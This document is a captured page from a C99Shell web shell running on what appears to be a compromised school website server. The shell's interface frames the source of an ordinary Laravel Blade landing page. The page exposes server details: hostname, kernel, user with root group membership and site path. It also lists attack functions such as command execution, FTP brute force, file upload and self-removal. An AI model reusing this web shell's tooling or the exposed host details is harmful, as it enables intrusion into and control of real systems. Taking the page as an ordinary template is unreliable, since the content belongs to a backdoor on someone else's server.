!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/frontend/   drwxr-xr-x
Free 29.24 GB of 117.98 GB (24.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     landing_page.blade.php (8.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('frontend.index')

@php

    $bannerSliderSection = json_decode(get_settings('banner_slider_section'));
    $head_teacher_message_section = json_decode(get_settings('head_teacher_message_sec'));
    $president_message_section = json_decode(get_settings('president_message_sec'));
    $about_school_sec = json_decode(get_settings('about_school_sec'));
    $student_attendence = json_decode(get_settings('student_attendence'));
    $social_media_link = json_decode(get_settings('social_media_link'));
//    $school_info_sec = json_decode(get_settings('school_info_sec'));

@endphp


@section('title')
    {{get_school_name()}}
@endsection




@section('content')





    <div class="leftCon">
        <div class="slider_theame">
            <div id="slider" class="nivoSlider">
                @foreach ($bannerSliderSection as $value)

                    @if (isset($value) && isset($value->image))
                        <img src="{{asset('uploads/'.$value->image)}}"
                             title="{{isset($value) && isset($value->banner_section_heading)?$value->banner_section_heading:''}}"
                             alt=""/>
                    @endif

                @endforeach


            </div>
        </div><!-- End of slider_theame -->
        <div class="boxcontainer">
            <p>
                <a href="{{route('notices')}}">
                    <span>নোটিশ</span>
                </a>
                <a href="{{route('routines')}}">
                    <span>ক্লাস রুটিন</span>
                </a>
                <a class="facilities" href="{{route('gallery')}}">
                    <span>গ্যালারি</span>
                </a>
                <a href="{{route('exam.results')}}">
                    <span>রেজাল্ট</span>
                </a>
            </p>
        </div>
        <!--end of boxcontainer-->
        <div class="nodes promoted">
            <div id="node-955" class="node node-type-page d-none">
                <h1 class="suborno-joyonti-title"><a href="{{route('suborno.joyonti')}}">বাংলাদেশের স্বাধীনতার সুবর্ণজয়ন্তী কর্ণার</a></h1>
                <div class="node-body">
                    <table
                        style="width: 100%; border-color: #2a1d1f; border-width: 2px; border-style: solid; height: 110px;"
                        border="5">
                        <tbody>
                        <tr>
                            <td style="text-align: center; border-color: #000000; border-width: 1px; border-style: solid;"
                                rowspan="2">
                                <p>
                                    <a href="{{route('suborno.joyonti')}}">
                                        <img style="border: 5px; padding: 5px;"
                                             src="{{asset('images/50.png')}}" alt=""
                                             width="235" height="123"/>
                                    </a>
                                </p>
                            </td>
                        </tr>
                        </tbody>
                    </table>
                    <div id="_mcePaste" class="mcePaste"
                         style="position: absolute; left: -10000px; top: 400px; width: 1px; height: 1px; overflow: hidden;">
                        <p class="MsoNormal" style="line-height: 120%;"><span
                                style="font-size: 16.0pt; line-height: 120%; font-family: SutonnyMJ; mso-bidi-font-family: &quot;Times New Roman&quot;;">c&Ouml;fvwZ

                                kvLv:<span style="mso-tab-count: 1;">&nbsp; </span><span
                                    style="mso-spacerun: yes;">&nbsp; </span>28/11/2021 wL&ordf;. <span
                                    style="mso-tab-count: 1;">&nbsp; </span>mKvj:<span
                                    style="mso-spacerun: yes;">&nbsp;
                                </span>10.00 Uv &dagger;_&Dagger;K 11.30
                                Uv|</span></p>
                        <p class="MsoNormal" style="line-height: 120%;"><span
                                style="font-size: 16.0pt; line-height: 120%;">*</span><span
                                style="font-size: 16.0pt; line-height: 120%; font-family: SutonnyMJ; mso-bidi-font-family: &quot;Times New Roman&quot;;">
                                <span style="mso-tab-count: 1;">&nbsp;&nbsp;&nbsp;&nbsp; </span>w`ev kvLv: <span
                                    style="mso-tab-count: 1;">&nbsp;&nbsp;&nbsp; </span><span
                                    style="mso-spacerun: yes;">&nbsp;&nbsp;</span>28/11/2021 wL&ordf;. <span
                                    style="mso-tab-count: 1;">&nbsp; </span>`ycyi: 12.00 Uv &dagger;_&Dagger;K 01.30
                                Uv|</span></p>
                    </div>
                </div>

            </div>
            <div id="node-313" class="node node-type-page">
                <h1><a href="#">
                        @if(isset($head_teacher_message_section) &&  isset($head_teacher_message_section->head_teacher_message_title))
                        <span  class="about-school-title">{{$head_teacher_message_section->head_teacher_message_title}}</span>
                       @endif

                    </a>

                </h1>
                <div class="node-body">
                    <p style="text-align: justify; font-size: 16px;"><img
                            style="float: left; padding: 3px 10px 5px 0px; border: 0;"

                            src="{{asset('uploads/'.$head_teacher_message_section->head_teacher_image_file)}}" alt=""
                            width="194" height="190"/>

                        @if(isset($head_teacher_message_section) &&  isset($head_teacher_message_section->head_teacher_message_description))
                            {!! $head_teacher_message_section->head_teacher_message_description !!}
                        @endif

                    </p>
                </div>

            </div>
             <div id="node-3132" class="node node-type-page">
                <h1><a href="#">
                        @if(isset($president_message_section) &&  isset($president_message_section->president_message_title))
                        <span  class="about-school-title">{{$president_message_section->president_message_title}}</span>
                       @endif

                    </a>

                </h1>
                <div class="node-body">
                    <p style="text-align: justify; font-size: 16px;">
                        @if (isset($president_message_section) && isset($president_message_section->president_image_file))
                         <img
                             style="float: left; padding: 3px 10px 5px 0px; border: 0;"

                            src="{{asset('uploads/'.$president_message_section->president_image_file)}}" alt=""
                            width="194" height="190"/>
                        @endif
        
                        @if(isset($president_message_section) &&  isset($president_message_section->president_message_description))
                            {!! $president_message_section->president_message_description !!}
                        @endif

                    </p>
                </div>

            </div>
            <div id="node-60" class="node node-type-page">
                <h1 class="about-school-sec"><a  href="#"><span class="about-school-title">{{isset($about_school_sec) &&

                            isset($about_school_sec->about_school_sec_title)?$about_school_sec->about_school_sec_title:''}}</span></a>
                </h1>
                <div class="node-body">
                    @if (isset($about_school_sec) && isset($about_school_sec->about_school_sec_image_file))
                        <p style="text-align: justify; font-size: 16px;"><img
                                style="float: left; padding: 3px 10px 5px 0px; border: 0;"
                                src="{{asset('uploads/'.$about_school_sec->about_school_sec_image_file)}}"
                                alt=""
                                width="472px" height="267px"/>

                            @if(isset($about_school_sec) && isset($about_school_sec->about_school_sec_description))
                                {!! $about_school_sec->about_school_sec_description !!}
                            @endif

                        </p>
                    @endif

                </div>

            </div>

            <div class="paging"></div>
        </div>
    </div>

@endsection

@section('js')



@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--